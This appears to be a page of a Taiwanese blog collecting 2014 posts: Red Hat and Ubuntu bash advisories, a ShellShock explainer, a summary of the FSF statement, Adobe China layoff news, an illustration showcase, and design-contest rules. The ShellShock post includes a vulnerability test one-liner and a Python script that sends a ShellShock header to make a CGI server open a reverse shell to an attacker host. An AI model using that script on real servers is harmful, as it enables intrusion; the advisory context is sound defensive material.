bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm

x86_64:
bash-4.1.2-15.el6_5.2.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm
bash-doc-4.1.2-15.el6_5.2.i686.rpm

x86_64:
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm
bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Client (v. 7):

Source:
bash-4.2.45-5.el7_0.4.src.rpm

x86_64:
bash-4.2.45-5.el7_0.4.x86_64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm
bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:
bash-4.2.45-5.el7_0.4.src.rpm

x86_64:
bash-4.2.45-5.el7_0.4.x86_64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64:
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm
bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:
bash-4.2.45-5.el7_0.4.src.rpm

ppc64:
bash-4.2.45-5.el7_0.4.ppc64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.ppc64.rpm

s390x:
bash-4.2.45-5.el7_0.4.s390x.rpm
bash-debuginfo-4.2.45-5.el7_0.4.s390x.rpm

x86_64:
bash-4.2.45-5.el7_0.4.x86_64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64:
bash-debuginfo-4.2.45-5.el7_0.4.ppc64.rpm
bash-doc-4.2.45-5.el7_0.4.ppc64.rpm

s390x:
bash-debuginfo-4.2.45-5.el7_0.4.s390x.rpm
bash-doc-4.2.45-5.el7_0.4.s390x.rpm

x86_64:
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm
bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:
bash-4.2.45-5.el7_0.4.src.rpm

x86_64:
bash-4.2.45-5.el7_0.4.x86_64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm
bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
#package">https://access.redhat.com/security/team/key/#package


7. References:

https://www.redhat.com/security/data/cve/CVE-2014-7169.html

https://access.redhat.com/security/updates/classification...
https://access.redhat.com/articles/1200223


8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/


Copyright 2014 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iD8DBQFUJMc4XlSAg2UNWIIRAsowAKCeLFE4QctUYTBC7bvqd6RTgUMptACcC2jt
wqMN2oFvaGhf5SqiZHqpyOA=
=Unt1
-----END PGP SIGNATURE-----


[h1]Ubuntu 10.04 / 12.04 / 14.04 BASH Update[/h1]
From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Subject: [USN-2363-1] Bash vulnerability
Date: Thu, 25 Sep 2014 18:35:21 -0400
Message-ID: <542498A9.6020900@canonical.com>
==========================================================================
Ubuntu Security Notice USN-2363-1
September 25, 2014

bash vulnerability
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS

Summary:

Bash allowed bypassing environment restrictions in certain environments.

Software Description:
- bash: GNU Bourne Again SHell

Details:

Tavis Ormandy discovered that the security fix for Bash included in
USN-2362-1 was incomplete. An attacker could use this issue to bypass
certain environment restrictions. (CVE-2014-7169)

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 14.04 LTS:
bash 4.3-7ubuntu1.2

Ubuntu 12.04 LTS:
bash 4.2-2ubuntu2.3

Ubuntu 10.04 LTS:
bash 4.1-2ubuntu3.2

In general, a standard system update will make all the necessary changes.

References:
http://www.ubuntu.com/usn/usn-2363-1

CVE-2014-7169

Package Information:
https://launchpad.net/ubuntu/+source/bash/4.3-7ubuntu1.2

https://launchpad.net/ubuntu/+source/bash/4.2-2ubuntu2.3

https://launchpad.net/ubuntu/+source/bash/4.1-2ubuntu3.2(2014-09-27 13:41)

[h1]自由軟體基金會對於 GNU Bash "ShellShock" 發表的聲明[/h1]

原文: http://www.fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shellshock-vulnerability

快速翻譯摘要如下:

1. 一個重大的 Bash 安全性問題被發現於 GNU Bash,目前已經有暫時解法;而完整的解法正在動工中。
所有使用 bash 的系統應該立即進行更新,並且監視 bash 相關的網路服務。

2. 此 Bug 俗稱為 "ShellShock",在某些特定狀況下,可以讓攻擊者取得 root 權限,不論是直接透過 bash
或者 call path 中有 bash 的(網路)應用。
可參考: NVD
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169

3. 因為 GNU Bash 為自由軟體且可靠好用,所以 ShellShock 影響範圍廣泛
所幸的是是因為他是 GPL V3,所以能讓自由軟體開發者如
Red Hat 快速的回應此 bug 並分享出 patch 讓各大上游開發者能夠同步修復。

4. 每個人都可以同時自由的下載、檢視、補綴自己的 bash,
不像是微軟(Microsoft) 或者蘋果(Apple),或者其他的私有軟體。

(這篇文章還順便酸了 Microsoft & Apple 一把,不曉得 FSF 官方聲明為什麼一定要這樣...)

5. 軟體自由是安全的大前提之一,保證每個人都可以檢視並偵測自己使用程式碼的安全性,
進而改善、製造更安全的軟體。

6. 不管是自由軟體或者私有軟體,都不保證 Bug-Free;Bug 會發生,與他的「授權方式」完全無關。
然而如果是在自由軟體發現的 bug ,每個人都有權限、權力、原始代碼來進行複製與修復;
接著此 patch 很快會廣為自由免費的散佈至每個人手上。
這種自由度對於安全運算事關重大。

7. 私有軟體(非自由軟體)依賴於一個「不平等(unjust)」的開發模式,
他隱藏了原始碼,並剝奪了使用者的基本權力;這樣不僅僅讓安全缺失難以發現,
並且容易讓這些開發商故意殖入可能有害的內容,並隱藏已經發現的嚴重問題。

有報告指出,微軟曾經提供給政府的情報組織一些尚未修復的漏洞資訊。
( http://www.computerworlduk.com/blogs/open-enterprise/how-can-any-company-ever-trust-microsoft-again-3569376/

8. 自由軟體並不能保證你的安全,某些狀況下,有可能比起私有軟體更顯得容易發現漏洞。
但比起「不容易發現的漏洞」,持續的監督、改善自由軟體,才是重點。

9. BASH 和其他 GNU 軟體的開發,大部分都是由義務組織或個人義務來貢獻他們才智時間;
我們正在檢視 Bash 的開發,並看增進對於 bash 計畫的資金贊助是否能夠避免未來發生類似問題;
如果您或您的單位組織,有使用 bash 並對於支援 bash 有興趣,請聯絡我們 ( http://www.fsf.org/news/donate@fsf.org


自由軟體基金會媒體窗口 John Sullivan Executive Director
Free Software Foundation +1 (617) 542 5942 campaigns@fsf.org





(2014-09-27 11:56)

[h1]Bash Security Bugs: 2014 九月底發現,請儘速更新修補

(尤其是有 CGI-BIN bash 服務的 server[/h1]

簡稱:ShellShock (當然,給他一個和 HeartBleed一樣的名字)

ShellSHock 影響: All Unix/Linux/BSD/MacOS/Windows 有用 bash 都會受到影響


ShellShock BASH 影響版本:
=> bash 1.14 ~ bash 4.3 (幾乎接近是 zero-day bug)


參考:
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
http://seclists.org/oss-sec/2014/q3/666

修補很簡單:
@ Ubuntu / Debian
$ apt-get update;apt-get upgrade
$ apt-get update && sudo apt-get install --only-upgrade bash (單純更新 bash)

@ Fedora/CentOS/Fedora
$ yum update
$ yum update bash (只更新 bash)

當然,「安全」的前提是,還沒被用此漏洞入侵。


漏洞可能影響的 scenario
1. Apache HTTP Servers (mod_cgi and mod_cgid) + Bash CGI scripts
2. 特定的 DHCP clients
3. OpenSSH server 使用 "ForeceCommand 參數"
4. 相關網路服務,其 path 中有使用到未 patch 的 bash




Q: 如何偵測?

最簡單的 Sample Code,如下面這一行,如果你會看 "vulnerable" 被印出來,
然後才看到 this is a test
那就代表 bash 有 security bug

代碼:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"


[hr]
Example Code #2:
代碼:

#
#CVE-2014-6271 cgi-bin reverse shell
#

import httplib,urllib,sys

if (len(sys.argv)<4):
   print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
   print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
   exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
   "test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data



Example Code #3:
代碼:

$ gcc bug.c
$ env TERM='() { :;}; echo vulnerable' a.out
vulnerable
#include <stdlib.h>

int main(void)
{
    return system("cat bug.c");
}



Update your Ubuntu/Redhat/Fedora/Debian
代碼:

$ ls -al /bin/bash
-rwxr-xr-x 1 root root 959120 Mar 29  2013 /bin/bash

$ apt-get update

$ apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages have been kept back:
  linux-image-virtual
The following packages will be upgraded:
  apt apt-utils bash dbus firefox-locale-en libapt-inst1.4 libapt-pkg4.12
  libdbus-1-3 libnss3 libnss3-1d
10 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
Need to get 5,421 kB of archives.
After this operation, 10.2 kB of additional disk space will be used.
Do you want to continue [Y/n]?


%  ls -al /bin/bash
-rwxr-xr-x 1 root root 959120  Sep 23 04:39 /bin/bash
(2014-09-26 13:16)

[h1] 2014/09 Adobe業績不彰撤出中國 僅留銷售單位 400名員工恐多數遭裁撤[/h1]

2014/09/25 18:25 鉅亨網 編譯李業德 綜合外電
=> 原文 http://xor.tw/+4w1k3

科技網站《ZDNet》周三 (24日) 報導,由於財務表現不彰,繪圖設計軟體製造商 Adobe Systems Inc. ( (US-ADBE) ) 宣布關閉中國市場總部,其 400 名員工恐怕大多數將遭到裁撤。

Adobe 的北京辦公室員工,於周三早上被召集到當地一間飯店,進行 15 分鐘的會談,期間被告知大多數人面對解聘的命運。

另一分報導指出,約 30 位員工將轉調至 Adobe 的美國和印度公司,中國市場內將僅留下銷售業務單位,而往後中國業務將交給印度分公司負責。

報導指出,公司員工被分為 5 組,並分別發給不同顏色的信封,以區別其最後一天留職的時間,拿到綠色信封的部門員工,會在 10 月底成為第一批離職群,紅色信封則是 12 月底。不過部份員工透露,他們離職時間的安排,係基於服務項目和月薪額度決定。

Adobe 於 9 月 17 日公開第三季財報,表示公司成長僅 1% 低於預期,且淨利下滑至 4470 萬美元,更是由去 (2013) 年同期大減 46%。

2012 年 12 月時,Adobe 宣布關閉台灣分公司,並將業務轉移到香港辦公室處理。(2014-09-25 19:02)

[center]擬人獸耳插畫[/center]
##DIV##
[center]
[h1]小說插畫、擬人獸耳插畫設計 - 白米熊 WRB's Fiction Cover Illustration[/h1]

left_to_their_world_by_whitericebear-d7bsfr1 留給他們的世界 - Their own high-land
湯圓 *湯圓* - Dumpling Swim suites
南極星的眼淚800 南極星的眼淚 - Tear Drops of Southern Stars
誘拐棕髮少女計畫 誘拐棕髮少女計畫 - Luring the Brown Hair Girl
毛線球 *毛線球* - Fur Ball Foxy
[hr]
More! shortpolarbear(WRB, 白米熊) Artworks:
http://vovo2000.com/paintbbs/art/shortpolarbear/
http://vovo2000.com/artist/shortpolarbear/tags/
http://vovo2000.com/artist/shortpolarbear/


[hr]
See Also
=> WRB(White-Rice-Bear's) Touhou Project Fan ARt



[hr]
See Also Related...
[url=http://vovo2000.com/tags/擬人/]
「擬人」相關創作 :: "Game Design" Artworks/Drawing/Illustration
[/url]

[url=http://vovo2000.com/tags/小說/]
「小說插畫」相關創作 :: "Fictions Cover" Artworks/Drawing/Illustration
[/url]

[url=http://vovo2000.com/tags/獸耳/]
「獸耳」相關創作 :: "Animal Ears" Artworks/Drawing/Illustration
[/url]

[url=http://vovo2000.com/tags/熊/]
「熊」創作 :: "Bear" Artworks Illustration/Fine Art/Art Pieces

[/url]

[/center](2014-09-23 22:37)

[h1]網站截圖 Some more Web pages captures update 2014[/h1]

[h2]http://www.shrinktheweb.com/[/h2]

1. Amazon Alexa 2009 停止後,開始使用 ShrinktheWeb basic account,用起來不錯,
但是常超過上限,而且不能 Access Inner page,只能抓 Top page。

e.g. 舉例
example.com/album/helloworld.html
基本帳戶,只能抓到 http://example.com/ 的首頁
如果要抓 Inner Page,則每個月要花到 $15 USD (5+10 USD)


=> http://www.shrinktheweb.com/




[h2]Hybrid: CutyCapt + PicoShot + Webthumbnail [/h2]

2. 2012 之後則是混合下列使用來進行「網站截圖」

(a) CutyCapt
=> 有寫一篇教學在此 http://xor.tw/+4wdt0

(b) PicoShot (Shrinktheweb 子公司, $5 USD/month) ,有免費/也有付費的方案!

=> http://picoshot.com/ (買的人很少,Support 大概要三四天)

(c) Webthumbnail,(目前 2014)完全免費! 但免費的,代表沒有 Support

=> http://webthumbnail.org/

(2014-09-23 13:33)

[h1]2014 聯合文創設計獎 (總獎 123 萬, ~2014/11/09)[/h1]

參賽官網: http://designaward.udn.com/
線上報名: http://designaward.udn.com/



!!!注意!!! 這個比賽「參賽要收費! ($600 NTD)」


「聯合文創設計獎」為聯合報系正式投入文創產業,成立「有.設計uDesign」文創設計商品平台之後,以行動進一步提升台灣設計師品牌能見度與全方位行銷。
「聯合文創設計獎」以概念組及成品組分組競賽,挹注超過百萬獎金,及聯合報系平面、電視、網路平台資源,整合電子商務、策展、宣傳力量,協助得獎者全方位發展規劃,為台灣文創產業打造完整產業鏈,持續產生正向的產業循環。

[h2]一、競賽資格[/h2]

1.凡設籍中華民國、對產品設計有興趣者皆可參賽,不限個人或團體。
* 產品設計:指可供量產之工業產品設計,包含一般與數位應用、交通工具設計、設備儀器設計、生活及家居用品設計、資通訊及家電產品設計及其他類等。
2.以團隊方式報名者,報名時需填寫一團隊代表人,主辦單位發送之通知及獎金之發放等,均以此人為送達代收者。
3.賽作品須為作者原創。

[h2]二、競賽分組[/h2]

1.概念組:設計於報名本活動前未參與其他競賽、未量產之作品。
2.成品組:設計於報名本活動前未參與其他競賽、已進入生產階段、可量產之作品。

[h2]三、競賽時程[/h2]

階 段 活 動 時 程

初選 開放報名 2014/09/15 ~ 11/09

初選評選 2014/11/10 ~ 11/23

入圍名單公布 2014/11/28

決選 + 人氣票選 繳交決選作品 2014/11/29 ~ 2015/01/12

決選評選 2015/01/13 ~ 01/26

人氣票選 2015/01/19~02/24

得獎公布 2015/02/27


頒獎典禮暨論壇 聯合文創設計獎 x udn talks

頒獎典禮暨文創設計論壇 2015/03/14

[h2]四、費用[/h2]

每一參賽作品酌收報名費用新台幣600元,費用包含:
1.「聯合文創設計獎」競賽資格。
2.「聯合文創設計獎 x udn talks頒獎典禮暨文創設計論壇」貴賓席位。

[h2]五、 注意事項[/h2]

1.所有參賽者,無論身分(學生,專業設計師或社會人士),皆需遵守本競賽所有條文規定,同一團隊之參賽者平等分享所獲得之獎項/獎金。

2.關於參賽者
參加競賽作品應為作者原創之作品,如違反本規定經查獲者,主辦單位有權取消其參賽資格。
參賽者須配合提供其創作之詳細資料,作為主辦單位日後公開報導與展示之用。
為維護參賽者之智慧財產權,建議晉級決選者針對作品實體模型或成品事先申請專利。
晉級決選之參賽者,需配合主辦單位於2015/01/13(二)-01/26(一)期間參與決選評審會議,繳交模型 / 實品,並進行5分鐘作品簡報。經協調後仍無法參與者,視為放棄參賽資格。

3.關於得獎者
各組前三名得獎者須配合主辦單位參與「聯合文創設計獎x udn talks頒獎典禮暨文創設計論壇」活動,除親至頒獎典禮受獎外,並需以得獎作品為主題進行10分鐘演講。
得獎者應依本國稅法規定課稅(台灣地區參賽者扣除10%所得稅,其他國家參賽者扣除20%所得稅)。

4.關於獲獎資格取消
獲獎作品經人檢舉涉及抄襲或違反智慧財產權等相關法令,經法院一審判決確定,或經著作權審議及調解委員會調解認定確屬侵害他人著作權,主辦單位得撤銷其獲獎資格並追回已頒發之獎金及獎章。
獲獎作品經人檢舉或告發為非自行創作或冒用他人作品且有具體事證者,主辦單位得撤銷其獲獎資格並追回已頒發之獎金及獎章。
5.關於報名資料之處理
為了維護參賽者之個人資料,主辦單位依個人資料保護法規定作以下事項告知:
個人資料蒐集之目的:
參賽者之管理及服務(例如為執行本競賽而通知、聯絡參賽者)、契約管理、內部的統計調查與研究分析(法定特定目的項目標號:069,090,157)。
主辦單位將於本競賽期間內及期間屆滿後為推廣本競賽之必要範圍內,於前述目的內蒐集、處理、儲存、傳遞、使用參賽者的個人資料,不另做其他用途。
蒐集之個人資料類別:
● C001辨識個人者:如姓名、職稱、國民身分證編號、電話(住家、工作電話及手機號碼)、住址(住家、戶籍及工作地址)、電子郵遞地址、網路平台帳號等資訊。
● C002辨識財務者:如金融機構帳戶號碼與姓名。
● C021家庭情形:如性別、國籍、出生年月日、婚姻狀況等。
● C031住家及設施:住所地址及C038職業及C051學校記錄。
個人資料利用之期間、地區、對象、方式:
● 期間:本競賽期間及期間屆滿後推廣本競賽之期間。
● 地區:主辦單位執行業務所及之地區。
● 利用之對象:主辦單位、其關係企業以及合作辦理本競賽之廠商(例如金流廠商、物流廠商)。
● 利用之方式:得以紙本、電子文件、電子郵件傳送或其他合於當時科技之適當方式利用之。
依個人資料保護法第三條規定,參賽者可以針對其個人資料行使以下權利:
● 查詢或請求閱覽。
● 請求製給複製本。
● 請求補充或更正。
● 請求停止蒐集、處理或利用。
● 請求刪除。
參賽者可自由選擇是否提供相關個人資料,惟若選擇不提供或是提供不完全時,將可能導致無法取得參賽資格。
參賽者應同意主辦單位可運用獲選作品之圖片與說明文字等資料,製作推廣本競賽效益所需之相關文宣、報導、展覽等。
6.參賽者若於完成繳費後申請退費,主辦單位將酌收10%退票手續費,並取消參賽資格。
7.主辦單位享有調整本競賽活動辦法之權利,調整內容將於本活動官網公布,不另行通知參賽者。


[h1]參賽程序[/h1]

一、報名方式

1.一律採取網路報名。
2.參賽者請於期限內點選 「線上報名」 ,依規定至「udn售票網」完成加入會員及繳費後,回到本活動官網登入會員,填寫參賽資料、上傳作品電子檔案,並同意「智慧財產權聲明」,即完成報名程序。
(*每組會員帳號限上傳一件作品)
二、初選

1.為減少印刷及郵寄資源浪費,以網路平台進行收件及初選之評選,參賽者無需寄送實體作品。
2.報名提供資料規格如下:
20字內中英文作品名稱。
600字以內之中英文作品創作理念。
作品圖檔 (如有說明文字請中英文並呈,以3張為限),格式可為jpg/png/bmp,模式:RGB,尺寸:寬1190x高840像素,解析度72 dpi以上,橫式排版,單一圖檔請勿超過3MB。
作品不得標示創作者姓名、公司/單位名稱或其他可影響評選公正性之代號或標記,違者取消資格。
3.參賽者可於報名截止日2014/11/09(日)前不限次數登入本活動官網修改參賽檔案,以最終修改之檔案參與競賽。
三、決選

1.採作品簡報評審會議進行評選:
評審會議: 2015/01/13(二)-01/26(一) 擇一日進行。(主辦單位另行通知)
簡報時間5分鐘。
依評審提問回答問題。
2.參與評審會議時需繳交1:1之實體模型或成品:
概念組:提供模型。
* 繳交1:1或等比例縮小之模型。若為縮小之模型,模型尺寸需於40*40*40 (cm3)~100* 100* 100(cm3)之總體積範圍內。
成品組:提供成品。

四、人氣票選

1.參加資格:晉級決選之作品。
2.票選時間:2015/01/19(一)-02/24(二)
3.於活動時間內獲得最多票數支持的前3名,為「最佳人氣獎」得主。
評選作業
一、評審組成

1.由主辦單位邀請國內外不同領域專家組成初、決選評審委員團進行評選。
2.若評審因病、傷或其他因素不克參與評審作業,主辦單位保留更換評審團人選的權利。
二、評選方式及標準

1.資格審查:針對參賽者及其作品進行包含資格、上傳資料齊備與否、作品格式符合規格與否等審查。
2.初選:安排評選會議,各組分別選出20件入圍作品晉級決選。
3.決選:安排評選會議,晉級決選者需繳交1:1實體模型(概念組)/實品(成品組),並進行5分鐘作品簡報。
4.評選標準:
評選標準 概念組 成品組
市場性 20% 40%
量產可行性 20% -
創意性 20% 20%
美感度 20% 20%
實用性 10% 10%
直覺易用 10% 10%

5.人氣票選:邀請網友於2015/01/19(一)-02/24(二)進行票選活動,於活動期間獲得最多票數支持的前3名,為「最佳人氣獎」得主。

獎勵辦法

一、獎金

獎項/組別 概念組 成品組

金獎1名 20萬 30萬
銀獎1名 12萬 20萬
銅獎1名 8萬 10萬
優選10名 1萬 1萬
人氣獎3名 1萬

二、獎章

金獎、銀獎、銅獎及優選得獎者,頒發「聯合文創設計獎」獎章。
三、媒體宣傳


1.聯合報系(含平面及網路)針對上述得獎者進行採訪及報導露出,並得在其他媒體刊登或委託其他媒體配合報導。
2.前3名得獎者須參與「聯合文創設計獎x udn talks頒獎典禮暨文創設計論壇」,本活動亦規畫完整會後報導。
3.晉級決選者,將參與人氣票選活動,於本活動官網曝光宣傳。

四、輔導參與國際三大設計獎項競賽:

1.德國IF (德國漢諾威工業設計獎)
2.德國Red dot (德國紅點設計獎)
3.日本Good Design
* 詳細辦法由主辦單位與得獎者另行洽商。

五、經紀機會

聯合報系為培育文創產業優秀人才,成立文創經紀事業單位,提供具潛力之設計人才相關協助,包含創業輔導、個人品牌行銷、國內外參展等。上述得獎者皆享有洽談經紀合約之資格。
線上報名
報名步驟

1. 前往「udn售票網」加入會員並完成繳費 (報名費600元)。
2. 回到本頁面,登入會員後依欄位填寫參賽資料、上傳作品電子檔案。
3. 系統將發送完成報名確認函至您填寫的email。(2014-09-22 22:17)

前往頁面 ←上一頁  1 ... 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 ... 559  下一頁→